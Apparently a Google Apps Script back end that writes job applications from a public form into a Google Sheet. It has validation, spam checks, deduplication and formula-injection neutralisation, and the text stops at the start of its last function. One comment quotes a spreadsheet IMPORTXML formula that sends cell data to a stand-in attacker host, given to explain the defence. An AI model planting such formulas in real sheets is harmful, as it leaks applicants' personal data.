/**
 * roof-careers — Google Apps Script Web App
 * ==========================================
 *
 * Receives one application from the public site and appends a row to a Google
 * Sheet. Deployed as "Execute as: me / Who has access: Anyone".
 *
 * EVERY response lands in the SAME spreadsheet, on the SAME tab, one row each —
 * that single table is the view of everyone who applied. There is no branching
 * by language, by role, or by anything else.
 *
 * THE SHEET IS BUILT FOR FILTERING
 * --------------------------------
 * Every click the candidate makes gets its OWN column — one per practice area,
 * pipeline stage, workflow style, project type, and one per distinct tool.
 * "Show me everyone who works with Stable Diffusion" is one click on that
 * column's filter, not a text search through a packed cell.
 *
 * The readable summaries stay on the left: those are for READING one
 * candidate. The wide per-click block on the right is for FILTERING a pile of
 * them. Different jobs, both needed. `Full Name` is column 2 so the frozen
 * panes keep the name in view while you scroll right.
 *
 * A tool appears in several of the form's 8 areas — Runway is in three — so its
 * column holds the LIST OF AREAS it was ticked in rather than a tick. One
 * filter then answers both who uses it and what they use it for, and 90
 * checkboxes still cost only 74 columns.
 *
 * EVERY QUESTION IS MULTI-SELECT as of v6, and v7 is down to three of them. No column here holds "the" answer
 * to a question any more; the readable ones hold a comma-joined list in roster
 * order, and the per-option Yes/blank block on the right is what you filter on.
 *
 * SECURITY MODEL — read this before changing anything
 * ---------------------------------------------------
 * The /exec URL is PUBLIC. It ships inside the site's JavaScript bundle and
 * anyone can find it. That is fine, and it is not a credential: it grants
 * exactly the capability this file implements and nothing else.
 *
 *   1. This script never RETURNS sheet contents. It reads row 1 (the header
 *      names) to place values in the right columns, and that is all — no
 *      applicant data is ever read back, and no response body carries anything
 *      but {ok:true|false}. Never add an endpoint that returns rows. As long as
 *      that holds, the worst a stranger with the URL can do is add junk rows.
 *   2. The real Google credentials never leave Google. The script runs as YOU,
 *      server-side. The browser holds no token, no key, no service account.
 *   3. The Turnstile SECRET lives in Script Properties, not in the bundle.
 *      Only the sitekey is public, which is how Turnstile is designed.
 *
 * SETUP
 * -----
 *   1. Open the target spreadsheet -> Extensions -> Apps Script.
 *   2. Paste this file over Code.gs.
 *   3. Project Settings -> Script Properties, add (all optional):
 *        SPREADSHEET_ID    pins the destination sheet explicitly
 *        SHEET_NAME        tab name, default "Applications"
 *        TURNSTILE_SECRET  Cloudflare Turnstile secret key
 *        NOTIFY_EMAIL      address to ping on each new application
 *   4. Run `setupSheet` once and approve the permission prompt. It builds the
 *      whole tab: columns, widths, formats, header style, filter, banding.
 *   5. Deploy -> New deployment -> Web app
 *        Execute as:      Me
 *        Who has access:  Anyone
 *      Copy the /exec URL into VITE_APPS_SCRIPT_URL on the site.
 *
 * After ANY edit to this file you must create a NEW deployment version,
 * otherwise the live URL keeps serving the old code.
 */

/* === GENERATED by `npm run sync:tools` — do not edit by hand === */
// Source: src/data/tools.ts, src/data/profile.ts, src/i18n/locales/en.json
// 74 distinct tools (90 checkboxes across 8 areas).

var TOOL_ROSTER = [
  { id: "comfyui", label: "ComfyUI" },
  { id: "invokeai", label: "InvokeAI" },
  { id: "swarmui", label: "SwarmUI" },
  { id: "automatic1111", label: "AUTOMATIC1111 / Stable Diffusion WebUI" },
  { id: "sd-webui-forge", label: "Stable Diffusion WebUI Forge" },
  { id: "fooocus", label: "Fooocus" },
  { id: "figma-weave", label: "Figma Weave" },
  { id: "filmustage", label: "Filmustage" },
  { id: "studiobinder", label: "StudioBinder" },
  { id: "celtx", label: "Celtx" },
  { id: "movie-magic-scheduling", label: "Movie Magic Scheduling" },
  { id: "movie-magic-budgeting", label: "Movie Magic Budgeting" },
  { id: "scenechronize", label: "Scenechronize" },
  { id: "sethero", label: "SetHero" },
  { id: "shot-lister", label: "Shot Lister" },
  { id: "chatgpt", label: "ChatGPT" },
  { id: "claude", label: "Claude" },
  { id: "google-gemini", label: "Google Gemini" },
  { id: "perplexity", label: "Perplexity" },
  { id: "ltx-studio", label: "LTX Studio" },
  { id: "midjourney", label: "Midjourney" },
  { id: "chatgpt-gpt-image", label: "ChatGPT / GPT Image" },
  { id: "flux", label: "FLUX" },
  { id: "adobe-firefly", label: "Adobe Firefly" },
  { id: "stable-diffusion", label: "Stable Diffusion" },
  { id: "krea", label: "Krea" },
  { id: "ideogram", label: "Ideogram" },
  { id: "recraft", label: "Recraft" },
  { id: "leonardo-ai", label: "Leonardo AI" },
  { id: "magnific", label: "Magnific" },
  { id: "scenario", label: "Scenario" },
  { id: "runway", label: "Runway" },
  { id: "kling", label: "Kling" },
  { id: "google-veo", label: "Google Veo" },
  { id: "sora", label: "Sora" },
  { id: "luma", label: "Luma" },
  { id: "boords", label: "Boords" },
  { id: "autodesk-flow-studio", label: "Autodesk Flow Studio" },
  { id: "meshy", label: "Meshy" },
  { id: "tripo-ai", label: "Tripo AI" },
  { id: "hyper3d-rodin", label: "Hyper3D / Rodin" },
  { id: "luma-3d", label: "Luma 3D" },
  { id: "kaedim", label: "Kaedim" },
  { id: "csm", label: "CSM" },
  { id: "hunyuan3d", label: "Hunyuan3D" },
  { id: "trellis", label: "Trellis" },
  { id: "stable-fast-3d", label: "Stable Fast 3D" },
  { id: "cascadeur", label: "Cascadeur" },
  { id: "deepmotion-animate-3d", label: "DeepMotion Animate 3D" },
  { id: "move-ai", label: "Move AI" },
  { id: "rokoko", label: "Rokoko" },
  { id: "plask", label: "Plask" },
  { id: "metahuman-animator", label: "MetaHuman Animator" },
  { id: "mixamo", label: "Mixamo" },
  { id: "accurig", label: "AccuRIG" },
  { id: "wonder-studio-dynamics", label: "Wonder Studio / Dynamics" },
  { id: "mediapipe", label: "MediaPipe" },
  { id: "openpose", label: "OpenPose" },
  { id: "faceware", label: "Faceware" },
  { id: "pika", label: "Pika" },
  { id: "hailuo", label: "Hailuo" },
  { id: "vidu", label: "Vidu" },
  { id: "seedance", label: "Seedance" },
  { id: "wan", label: "Wan" },
  { id: "hunyuanvideo", label: "HunyuanVideo" },
  { id: "ltx-video", label: "LTX Video" },
  { id: "adobe-firefly-video", label: "Adobe Firefly Video" },
  { id: "nuke", label: "Nuke" },
  { id: "adobe-after-effects", label: "Adobe After Effects" },
  { id: "davinci-resolve", label: "DaVinci Resolve" },
  { id: "wonder-studio", label: "Wonder Studio" },
  { id: "wonder-dynamics", label: "Wonder Dynamics" },
  { id: "mocha-pro", label: "Mocha Pro" },
  { id: "silhouette", label: "Silhouette" }
]

var AREA_ROSTER = [
  { id: "ai-workflow", label: "AI workflow / node-based" },
  { id: "production-management", label: "Production management / planning" },
  { id: "development", label: "Development / creative research" },
  { id: "concept", label: "Concept art / visual development / storyboard / previs / animatic" },
  { id: "modeling", label: "3D / modeling / assets / character / rigging / animation" },
  { id: "mocap", label: "Motion capture / performance" },
  { id: "video", label: "Video generation" },
  { id: "vfx", label: "VFX / compositing / cleanup" }
]

var EXPERTISE_ROSTER = [
  { id: "art-director", label: "Art Director" },
  { id: "designer", label: "Designer" },
  { id: "animator", label: "Animator" },
  { id: "other", label: "Other" }
]

var AI_WORKFLOW_ROSTER = [
  { id: "combine", label: "I combine different AI tools in the same workflow" },
  { id: "customized", label: "I build customized workflows for different needs" },
  { id: "node-based", label: "I use node-based / modular workflows" },
  { id: "per-project", label: "I create or modify workflows for specific projects" }
]

var STRENGTH_ROSTER = [
  { id: "concepts-directions", label: "Developing concepts and visual directions" },
  { id: "complex-challenges", label: "Solving complex visual challenges" },
  { id: "languages-worlds", label: "Creating visual languages and worlds" },
  { id: "execution-refinement", label: "High-level execution and refinement" }
]

var PIPELINE_ROSTER = [
  { id: "direction", label: "Direction" },
  { id: "pre-production", label: "Pre-production: Concept & Design" },
  { id: "2d-animation", label: "2D animation" },
  { id: "3d-animation", label: "3D animation" },
  { id: "vfx", label: "VFX" },
  { id: "post-finishing", label: "Post-production & Finishing" },
  { id: "production", label: "Production" }
]

var PROJECT_TYPE_ROSTER = [
  { id: "feature-film", label: "Feature Film" },
  { id: "short-film", label: "Short Film" },
  { id: "commercial", label: "Commercial / Advertising" },
  { id: "music-video", label: "Music Video" },
  { id: "series", label: "Series / Episodic" },
  { id: "generative-film", label: "AI / Generative Film" }
]
/* === END GENERATED === */

/* ────────────────────────────────────────────────────────────────────────
   THE SCHEMA — one definition, not two lists to keep in sync

   Header text, column width, number format and the value extractor live
   together on one object. Adding, removing or reordering a column is a single
   edit here; there is no second array that can silently drift out of step and
   start writing every value one column to the left.

   `header` doubles as the identity of the column: rows are placed by matching
   these names against row 1 of the sheet, so a column dragged around by hand
   in Sheets keeps receiving the right data.
   ──────────────────────────────────────────────────────────────────────── */

function profileField(name) {
  return function (payload) {
    return String((payload.profile || {})[name] || "")
  }
}

function metaField(name) {
  return function (payload) {
    return String((payload.meta || {})[name] || "")
  }
}

/** Turns a list of picked ids into the human labels, in roster order. */
function labelsFor(roster, ids) {
  var picked = ids || []
  return roster
    .filter(function (entry) {
      return picked.indexOf(entry.id) !== -1
    })
    .map(function (entry) {
      return entry.label
    })
    .join(", ")
}

/**
 * The optional contact links, as one line for the notification mail only.
 *
 * The SHEET keeps them in six separate columns — this collapse exists purely
 * so the "new application" email is readable, and nothing parses it back.
 */
var LINK_FIELDS = [
  { key: "website", label: "Site" },
  { key: "behance", label: "Behance" },
  { key: "vimeo", label: "Vimeo" },
  { key: "instagram", label: "Instagram" },
  { key: "linkedin", label: "LinkedIn" },
  { key: "otherLink", label: "Outro" }
]

function linkSummary(profile) {
  var out = []
  for (var i = 0; i < LINK_FIELDS.length; i++) {
    var value = String(profile[LINK_FIELDS[i].key] || "").trim()
    if (value) out.push(LINK_FIELDS[i].label + ": " + value)
  }
  return out.join(" | ")
}

/**
 * The production areas a given tool was ticked in.
 *
 * The same tool lives in up to eight areas in the form — Runway is one of them
 * — and "Runway for VFX" is a different fact from "Runway for storyboard". One
 * column per tool holds that list, so a single filter answers both who works
 * with it and what they use it for, without 300 columns.
 */
function areasForTool(payload, toolId) {
  var picked = {}
  var picks = payload.tools || []

  for (var i = 0; i < picks.length; i++) {
    if (picks[i].id === toolId) picked[picks[i].group] = true
  }

  // Roster order, never click order: two people who picked the same areas must
  // produce the SAME cell text, or the filter treats them as different values.
  return AREA_ROSTER.filter(function (area) {
    return picked[area.id]
  })
    .map(function (area) {
      return area.label
    })
    .join(", ")
}

/** Distinct tools, ignoring the area they were ticked in. */
function distinctToolCount(payload) {
  var seen = {}
  var picks = payload.tools || []
  for (var i = 0; i < picks.length; i++) seen[picks[i].id] = true
  return Object.keys(seen).length
}

/**
 * THE SAME CONTRACT THE BROWSER ENFORCES, RESTATED WHERE IT CANNOT BE SKIPPED.
 *
 * `validate()` in ApplicationForm.tsx asks for these five and for at least one
 * tool. This used to ask for two of them, which meant three were guarded by
 * nothing but the copy of the bundle in front of the candidate — a stale one
 * out of the Pages cache, or anything that is not the form at all, could write
 * a row with no phone, no location and no portfolio and be thanked for it.
 *
 * Keep this list and `validate()` in step. They are two files that cannot
 * import each other, so nothing but attention keeps them together.
 */
var REQUIRED_PROFILE_FIELDS = ["fullName", "email", "phone", "location", "portfolio"]

/** The names of the required things this payload does not have. */
function missingRequired(payload) {
  var profile = payload.profile || {}

  var missing = REQUIRED_PROFILE_FIELDS.filter(function (name) {
    return !String(profile[name] || "").trim()
  })

  // The toolkit is answerable either by ticking something or by typing it in
  // the "anything else" box, exactly as the form has it.
  var tools = payload.tools || []
  if (!tools.length && !String(payload.otherTools || "").trim()) {
    missing.push("tools")
  }

  return missing
}

/** The header `appendRow` looks in to decide whether it has seen a row. */
var SUBMISSION_ID_HEADER = "Submission Id"

var TRIAGE_STATUSES = ["Novo", "Em análise", "Contatado", "Shortlist", "Arquivado"]
var RATINGS = ["1", "2", "3", "4", "5"]

/** The readable half: what you look at when reading ONE candidate. */
var BASE_COLUMNS = [
  {
    header: "Received At",
    width: 145,
    format: "yyyy-mm-dd hh:mm:ss",
    value: function () {
      return new Date()
    }
  },
  // Second on purpose: the frozen columns stop here, so the name stays visible
  // while you scroll right through the wide filtering block.
  { header: "Full Name", width: 190, value: profileField("fullName") },
  {
    // Seeded as "Novo" on arrival, then owned by the team.
    header: "Status",
    width: 110,
    validation: TRIAGE_STATUSES,
    value: function () {
      return TRIAGE_STATUSES[0]
    }
  },
  {
    // Left blank by the form — this is the team's score. Numeric so the column
    // sorts, a dropdown so nobody invents a 7.
    header: "Rating",
    width: 70,
    format: "0",
    align: "center",
    validation: RATINGS,
    value: null
  },
  {
    header: "Primary Practice",
    width: 200,
    value: function (payload) {
      return labelsFor(EXPERTISE_ROSTER, payload.expertise)
    }
  },
  { header: "Email", width: 210, value: profileField("email") },
  { header: "Phone / WhatsApp", width: 150, value: profileField("phone") },
  { header: "Location", width: 160, value: profileField("location") },
  { header: "Portfolio / Demo Reel", width: 260, value: profileField("portfolio") },

  // One column per service instead of the old free-text "Additional Links".
  // That box collected three URLs and a comment in a single cell, which is a
  // cell you can read but never filter or click.
  { header: "Site", width: 220, value: profileField("website") },
  { header: "Behance", width: 220, value: profileField("behance") },
  { header: "Vimeo", width: 220, value: profileField("vimeo") },
  { header: "Instagram", width: 220, value: profileField("instagram") },
  { header: "LinkedIn", width: 220, value: profileField("linkedin") },
  { header: "Other Link", width: 220, value: profileField("otherLink") },

  // The five remaining questions, in the order the form asks them. Kept
  // adjacent so a seniority read is one glance across, not a hunt through the
  // sheet. ALL FIVE ARE LISTS — v6 has no single-answer question left, so
  // every one of these resolves through `labelsFor`, never `labelOf`.
  {
    header: "AI Workflow",
    width: 340,
    value: function (payload) {
      return labelsFor(AI_WORKFLOW_ROSTER, payload.aiWorkflow)
    }
  },
  {
    header: "Core Strength",
    width: 300,
    value: function (payload) {
      return labelsFor(STRENGTH_ROSTER, payload.strength)
    }
  },

  {
    header: "Led Projects",
    width: 300,
    value: function (payload) {
      return labelsFor(PROJECT_TYPE_ROSTER, payload.projectTypes)
    }
  },
  {
    header: "Pipeline Areas",
    width: 300,
    value: function (payload) {
      return labelsFor(PIPELINE_ROSTER, payload.pipeline)
    }
  },
  {
    header: "AI Project (led)",
    width: 240,
    value: function (payload) {
      return String(payload.aiLedLink || "")
    }
  },
  {
    header: "AI Project (executed)",
    width: 240,
    value: function (payload) {
      return String(payload.aiExecutedLink || "")
    }
  },
  {
    header: "Tools Count",
    width: 90,
    format: "0",
    align: "center",
    value: distinctToolCount
  },
  {
    header: "All Tools",
    width: 360,
    value: function (payload) {
      var seen = {}
      var out = []
      var picks = payload.tools || []
      for (var i = 0; i < picks.length; i++) {
        if (seen[picks[i].id]) continue
        seen[picks[i].id] = true
        out.push(picks[i].name)
      }
      return out.join(", ")
    }
  },
  {
    header: "Other Tools",
    width: 220,
    value: function (payload) {
      return String(payload.otherTools || "")
    }
  },
  { header: "Language", width: 80, align: "center", value: metaField("language") },
  { header: "Timezone", width: 150, value: metaField("timezone") },
  { header: "Submitted At (client)", width: 165, value: metaField("submittedAt") },
  { header: "Form Version", width: 95, align: "center", value: metaField("formVersion") },
  {
    // The client's id for one filled form, the same across every retry of it.
    // `appendRow` refuses to write a row whose id is already here — see the
    // comment there for why a retry is a normal thing to expect.
    header: SUBMISSION_ID_HEADER,
    width: 150,
    value: metaField("submissionId")
  },
  {
    // Empty for an ordinary submission. "honeypot" means the hidden field came
    // back filled, which USED TO MEAN the row was silently discarded.
    header: "Flags",
    width: 110,
    align: "center",
    value: function (payload) {
      return String((payload.guard || {}).flags || "")
    }
  },
  { header: "User Agent", width: 240, value: metaField("userAgent") },
  {
    // Free space for the team. No extractor: the form has nothing to say here.
    header: "Notes",
    width: 280,
    value: null
  }
]

/**
 * One column per click, appended after the readable half.
 *
 * Prefixes keep every header unique — a tool called Figma and a practice area
 * called Design must never collide with a base column — and make the blocks
 * obvious when scrolling.
 *
 *   Practice:  primary practice areas
 *   Workflow:  how they assemble tools
 *   Strength:  what they are best at
 *   Pipeline:  pipeline areas
 *   Led:       project types where they held a leading role
 *   Link:      the credits link for that project type
 *   Tool:      the production areas they use that tool in
 *
 * EVERY QUESTION NOW GETS THIS BLOCK. While the practice questions were
 * single-select, their one readable column was already filterable — pick a
 * value from the dropdown and you had your list. Multi-select killed that:
 * "Art Director, Animator" and "Animator, Art Director" are two different
 * filter values, and neither of them is "everyone who animates". A Yes/blank
 * column per option is the only shape that survives the change.
 */
function buildColumns() {
  var columns = BASE_COLUMNS.slice()

  var flag = function (prefix, roster, pick) {
    roster.forEach(function (entry) {
      columns.push({
        header: prefix + ": " + entry.label,
        width: 130,
        align: "center",
        value: function (payload) {
          return (pick(payload) || []).indexOf(entry.id) !== -1 ? "Yes" : ""
        }
      })
    })
  }

  flag("Practice", EXPERTISE_ROSTER, function (p) {
    return p.expertise
  })
  flag("Workflow", AI_WORKFLOW_ROSTER, function (p) {
    return p.aiWorkflow
  })
  flag("Strength", STRENGTH_ROSTER, function (p) {
    return p.strength
  })
  flag("Pipeline", PIPELINE_ROSTER, function (p) {
    return p.pipeline
  })

  PROJECT_TYPE_ROSTER.forEach(function (type) {
    columns.push({
      header: "Led: " + type.label,
      width: 130,
      align: "center",
      value: function (payload) {
        return (payload.projectTypes || []).indexOf(type.id) !== -1 ? "Yes" : ""
      }
    })
    columns.push({
      header: "Link: " + type.label,
      width: 220,
      value: function (payload) {
        return String((payload.projectLinks || {})[type.id] || "")
      }
    })
  })

  TOOL_ROSTER.forEach(function (tool) {
    columns.push({
      header: "Tool: " + tool.label,
      width: 150,
      value: function (payload) {
        return areasForTool(payload, tool.id)
      }
    })
  })

  return columns
}

/**
 * Must match FORM_VERSION in src/lib/submit.ts. It is reported by `doGet` so a
 * deployment can be identified from outside without opening the editor.
 */
var SCHEMA_VERSION = "7"

var COLUMNS = buildColumns()

var HEADERS = COLUMNS.map(function (column) {
  return column.header
})

/** Roof brown with white ink — the header reads as the brand, not as a default. */
var HEADER_BG = "#322127"
var HEADER_FG = "#ffffff"

var SHEET_NAME = PropertiesService.getScriptProperties().getProperty("SHEET_NAME") || "Applications"

/** Anything faster than this was not typed by a person. */
var MIN_ELAPSED_MS = 4000

/* ────────────────────────────────────────────────────────────────────────
   Entry points
   ──────────────────────────────────────────────────────────────────────── */

/**
 * Health check only. Returns a fixed object and NEVER touches the sheet —
 * this endpoint is public, so it must not become a way to read applications.
 */
function doGet() {
  // The fingerprint answers the one question you actually have when staring at
  // two /exec URLs: WHICH CODE IS THIS ONE RUNNING? A bare {ok:true} is
  // identical across every version ever deployed, so it proves the deployment
  // is alive and nothing else — and a deployment left pinned to an old version
  // is the failure this endpoint exists to catch.
  //
  // Everything here is read from constants already in memory. NO SHEET ACCESS:
  // this endpoint is public, and it must never become a way to read
  // applications. Counts of the schema are not applicant data.
  return json({
    ok: true,
    service: "roof-careers",
    schema: SCHEMA_VERSION,
    columns: COLUMNS.length,
    tools: TOOL_ROSTER.length,
    areas: AREA_ROSTER.length
  })
}

function doPost(e) {
  try {
    if (!e || !e.postData || !e.postData.contents) {
      return json({ ok: false, error: "empty body" })
    }

    var payload = JSON.parse(e.postData.contents)
    var guard = payload.guard || {}

    /*
     * Honeypot: a human never fills a field they cannot see — except that a
     * password manager fills it FOR them, and then the person is not a bot and
     * we have just thrown their application away.
     *
     * This used to `return json({ ok: true })` and write nothing, which is
     * indistinguishable, from the outside, from the form working. The row is
     * written now and marked in the Flags column instead. Spam is a row Cris
     * can filter; a lost candidate is not recoverable.
     *
     * The mail notification is the one thing a flagged row does not get, so a
     * flood cannot turn into a flood of email. If real spam ever arrives, the
     * escalation is TURNSTILE_SECRET, which is already wired below.
     */
    if (guard.hp) {
      console.warn("honeypot tripped — writing flagged: " + String(guard.hp).slice(0, 80))
      guard.flags = "honeypot"
      payload.guard = guard
    }

    if (typeof guard.elapsedMs === "number" && guard.elapsedMs < MIN_ELAPSED_MS) {
      return json({ ok: false, error: "too fast" })
    }

    var turnstileSecret =
      PropertiesService.getScriptProperties().getProperty("TURNSTILE_SECRET") || ""
    if (turnstileSecret && !verifyTurnstile(turnstileSecret, guard.turnstileToken)) {
      return json({ ok: false, error: "failed verification" })
    }

    var missing = missingRequired(payload)
    if (missing.length) {
      // Named in the log and in the answer: a row that never arrived is a
      // question someone will ask, and "missing required fields" alone is not
      // an answer to it.
      console.warn("rejected — missing: " + missing.join(", "))
      return json({ ok: false, error: "missing required fields: " + missing.join(", ") })
    }

    var written = appendRow(payload)

    // A duplicate is the expected shape of a retry, not an error: the row is
    // written before this answer travels back, and the answer can be lost.
    if (!written) {
      return json({ ok: true, duplicate: true })
    }

    if (!guard.flags) notify(payload)

    return json({ ok: true })
  } catch (err) {
    console.error(err)
    return json({ ok: false, error: "server error" })
  }
}

/* ────────────────────────────────────────────────────────────────────────
   Sheet
   ──────────────────────────────────────────────────────────────────────── */

/**
 * ONE spreadsheet, ONE tab, for every single response — that is the whole
 * point: a single view of everyone who applied. Nothing here ever creates a
 * second destination.
 *
 * `SPREADSHEET_ID` pins it explicitly. Without it we fall back to the bound
 * spreadsheet, which only exists when the script was created from
 * Extensions -> Apps Script. A standalone project has no bound sheet and
 * would fail silently at `getActiveSpreadsheet()` — so we fail loudly instead.
 */
function getSpreadsheet() {
  var id = PropertiesService.getScriptProperties().getProperty("SPREADSHEET_ID")
  var spreadsheet = id ? SpreadsheetApp.openById(id) : SpreadsheetApp.getActiveSpreadsheet()

  if (!spreadsheet) {
    throw new Error("No spreadsheet bound to this script. Set the SPREADSHEET_ID script property.")
  }
  return spreadsheet
}

function getSheet() {
  var spreadsheet = getSpreadsheet()
  var sheet = spreadsheet.getSheetByName(SHEET_NAME)
  if (!sheet) {
    sheet = spreadsheet.insertSheet(SHEET_NAME)
  }
  return sheet
}

/** The header row as it actually is right now, trimmed of trailing blanks. */
function readHeaderRow(sheet) {
  if (sheet.getLastRow() === 0) return []

  var width = Math.max(sheet.getLastColumn(), 1)
  var values = sheet.getRange(1, 1, 1, width).getValues()[0]

  while (values.length && String(values[values.length - 1]).trim() === "") {
    values.pop()
  }
  return values.map(function (value) {
    return String(value).trim()
  })
}

/**
 * Brings the sheet up to the current schema WITHOUT touching existing data.
 *
 * Columns already present keep their position, so a column someone dragged
 * around by hand — or data already under it — is never scrambled. Only genuinely
 * missing columns are appended on the right. Nothing is ever deleted: removing a
 * column is a decision with data loss attached, and it belongs to a human.
 */
/**
 * A new spreadsheet has 26 columns. This schema is well past that, and
 * `getRange` beyond the sheet's width THROWS — it does not grow the sheet. So
 * every header write has to buy the space first.
 */
function ensureColumns(sheet, total) {
  var have = sheet.getMaxColumns()
  if (total > have) sheet.insertColumnsAfter(have, total - have)
}

function syncHeaders(sheet) {
  var existing = readHeaderRow(sheet)

  if (!existing.length) {
    ensureColumns(sheet, HEADERS.length)
    sheet.getRange(1, 1, 1, HEADERS.length).setValues([HEADERS])
    return HEADERS.slice()
  }

  var missing = HEADERS.filter(function (header) {
    return existing.indexOf(header) === -1
  })

  if (missing.length) {
    ensureColumns(sheet, existing.length + missing.length)
    sheet.getRange(1, existing.length + 1, 1, missing.length).setValues([missing])
    existing = existing.concat(missing)
  }
  return existing
}

/**
 * Run this by hand, once, after pasting the script — and again any time the
 * schema here changes. Idempotent: it repairs an existing tab in place and
 * never rewrites a row of data.
 */
function setupSheet() {
  var sheet = getSheet()
  var headers = syncHeaders(sheet)
  var width = headers.length
  var maxRows = sheet.getMaxRows()

  // Header row: brand colors, bold, frozen, and tall enough to breathe.
  var headerRange = sheet.getRange(1, 1, 1, width)
  headerRange
    .setFontWeight("bold")
    .setBackground(HEADER_BG)
    .setFontColor(HEADER_FG)
    .setVerticalAlignment("middle")
    .setWrap(false)
  sheet.setRowHeight(1, 32)
  sheet.setFrozenRows(1)

  // Freeze through the name so the wide per-click block stays readable when
  // scrolled right — without it you lose track of whose row you are looking at.
  var nameIndex = headers.indexOf("Full Name")
  sheet.setFrozenColumns(nameIndex >= 0 ? nameIndex + 1 : 1)

  // Per-column width, number format, alignment and validation — driven by the
  // schema, matched by header name so a manually reordered sheet still works.
  COLUMNS.forEach(function (column) {
    var index = headers.indexOf(column.header)
    if (index === -1) return
    var position = index + 1

    sheet.setColumnWidth(position, column.width)

    if (maxRows < 2) return
    var body = sheet.getRange(2, position, maxRows - 1, 1)

    // CLIP, not WRAP: one application must stay one screen-height row. The full
    // value is still there — click the cell to read it.
    body.setWrap(false)
    // Deliberately NOT forcing a plain-text ("@") format on the other columns.
    // `asText` already neutralises formulas with a leading apostrophe, which
    // Sheets strips while parsing the write. A text-formatted cell skips that
    // parsing — so doing both would leave the apostrophe visible in every
    // international phone number. One mechanism, not two fighting.
    if (column.format) body.setNumberFormat(column.format)
    if (column.align) body.setHorizontalAlignment(column.align)

    if (column.validation) {
      body.setDataValidation(
        SpreadsheetApp.newDataValidation()
          .requireValueInList(column.validation, true)
          .setAllowInvalid(false)
          .build()
      )
    }
  })

  // Rebuild the filter and banding rather than stacking duplicates on re-run.
  var existingFilter = sheet.getFilter()
  if (existingFilter) existingFilter.remove()

  sheet.getBandings().forEach(function (banding) {
    banding.remove()
  })

  if (maxRows > 1) {
    sheet.getRange(1, 1, maxRows, width).createFilter()

    // Banding on the DATA rows only, with showHeader false. Include row 1 and
    // the theme paints its own header color straight over the Roof brown.
    sheet
      .getRange(2, 1, maxRows - 1, width)
      .applyRowBanding(SpreadsheetApp.BandingTheme.LIGHT_GREY, false, false)
  }

  SpreadsheetApp.flush()
  return "ok — '" + SHEET_NAME + "' ready with " + width + " columns"
}

/**
 * Stops the spreadsheet from EXECUTING what a stranger typed into the form.
 *
 * Sheets parses a leading `=`, `+`, `-` or `@` as a formula, exactly as if the
 * value had been typed into the cell. Two consequences, one annoying and one
 * serious:
 *
 *   - "+55 11 90000-0000" is not a valid formula, so the phone number of every
 *     candidate who writes their country code lands as #ERROR! and is lost.
 *   - "=IMPORTXML(\"https://attacker.example/?\"&A2, \"//a\")" IS a valid
 *     formula. It would run the moment someone on the team opens the sheet, and
 *     ship other people's data straight out to whoever submitted it.
 *
 * That second one matters more than it looks: this script is careful never to
 * read applicant data back out, but a formula sitting in the sheet turns the
 * SPREADSHEET into the read channel and walks around that guarantee entirely.
 *
 * A leading apostrophe is Sheets' own "this is text" marker. It is not part of
 * the stored value — `getValue()` returns the string without it — so the cell
 * shows exactly what the candidate typed, inert.
 *
 * Dates and numbers are passed through untouched: they are ours, not theirs.
 */
function asText(value) {
  if (typeof value !== "string" || !value) return value
  return /^[=+\-@\t\r]/.test(value) ? "'" + value : value
}

function appendRow(payload) {
  // Two people submitting in the same second would otherwise race for the same
  // row. The lock costs nothing at this volume.
  var lock = LockService.getScriptLock()
  lock.waitLock(15000)

  try {
    var sheet = getSheet()
    var headers = syncHeaders(sheet)

    /*
     * ALREADY HERE? THEN THIS IS A RETRY, NOT A SECOND APPLICATION.
     *
     * A POST to /exec is answered across a redirect, and the row is written on
     * the first hop. Lose the second hop — a phone changing cell, a tab closed,
     * the 25s ceiling in the browser — and the candidate is told it failed
     * while the row sits in the sheet. They press send again, as anyone would.
     *
     * The scan runs inside the lock this function already holds, so two copies
     * arriving at once cannot both miss each other. It reads one column, which
     * at this volume is a single cheap range read.
     */
    if (!isNewSubmission(sheet, headers, payload)) return false

    // Values are placed BY HEADER NAME, never by position. Reorder the columns
    // in Sheets and the data still lands where it belongs; a header we do not
    // know (someone's own column) is left untouched.
    var byHeader = {}
    COLUMNS.forEach(function (column) {
      if (column.value) byHeader[column.header] = column.value(payload)
    })

    var row = headers.map(function (header) {
      var value = Object.prototype.hasOwnProperty.call(byHeader, header) ? byHeader[header] : ""
      return asText(value)
    })

    sheet.appendRow(row)
    return true
  } finally {
    lock.releaseLock()
  }
}

/**
 * False when this submission id is already in the sheet.
 *
 * An id we were not given cannot be checked, so an old client — one built
 * before `meta.submissionId` existed — is always treated as new. That is the
 * safe direction: a possible duplicate row beats a dropped application.
 */
function isNewSubmission(sheet, headers, payload) {
  var id = String((payload.meta || {}).submissionId || "").trim()
  if (!id) return true

  var index = headers.indexOf(SUBMISSION_ID_HEADER)
  if (index === -1) return true

  var lastRow = sheet.getLastRow()
  if (lastRow < 2) return true

  var seen = sheet.getRange(2, index + 1, lastRow - 1, 1).getValues()
  for (var i = 0; i < seen.length; i++) {
    if (String(seen[i][0]).trim() === id) return false
  }
  return true
}

/* ────────────────────────────────────────────────────────────────────────
   Helpers
   ──────────────────────────────────────────────────────────────────────── */

function verifyTurnstile(secret, token) {
  if (!token) return false

  try {
    var response = UrlFetchApp.fetch("https://challenges.cloudflare.com/turnstile/v0/siteverify", {
      method: "post",
      payload: { secret: secret, response: token },
      muteHttpExceptions: true
    })
    var result = JSON.parse(response.getContentText())
    return result.success === true
  } catch (err) {
    console.error(err)
    // Cloudflare being unreachable must not cost us a real candidate.
    return true
  }
}

/** Optional heads-up mail. Silent no-op when NOTIFY_EMAIL is not set. */
function notify(payload) {
  var to = PropertiesService.getScriptProperties().getProperty("NOTIFY_EMAIL")
  if (!to) return

  var profile = payload.profile || {}
  var tools = payload.tools || []

  try {
    MailApp.sendEmail({
      to: to,
      subject: "Nova inscrição — " + (profile.fullName || "sem nome"),
      body: [
        profile.fullName,
        profile.email,
        profile.phone,
        profile.location,
        "",
        "Atuação: " + (labelsFor(EXPERTISE_ROSTER, payload.expertise) || "—"),
        "Forte em: " + (labelsFor(STRENGTH_ROSTER, payload.strength) || "—"),
        "Liderou em: " + (labelsFor(PROJECT_TYPE_ROSTER, payload.projectTypes) || "—"),
        "",
        "Portfólio: " + (profile.portfolio || "—"),
        "Links: " + (linkSummary(profile) || "—"),
        "",
        "Pipeline: " + (labelsFor(PIPELINE_ROSTER, payload.pipeline) || "—"),
        distinctToolCount(payload) + " ferramentas",
        payload.otherTools ? "Outras: " + payload.otherTools : "",
        "",
        getSpreadsheet().getUrl()
      ].join("\n")
    })
  } catch (err) {
    // A mail failure must never lose the row that was already written.
    console.error(err)
  }
}

function json(obj) {
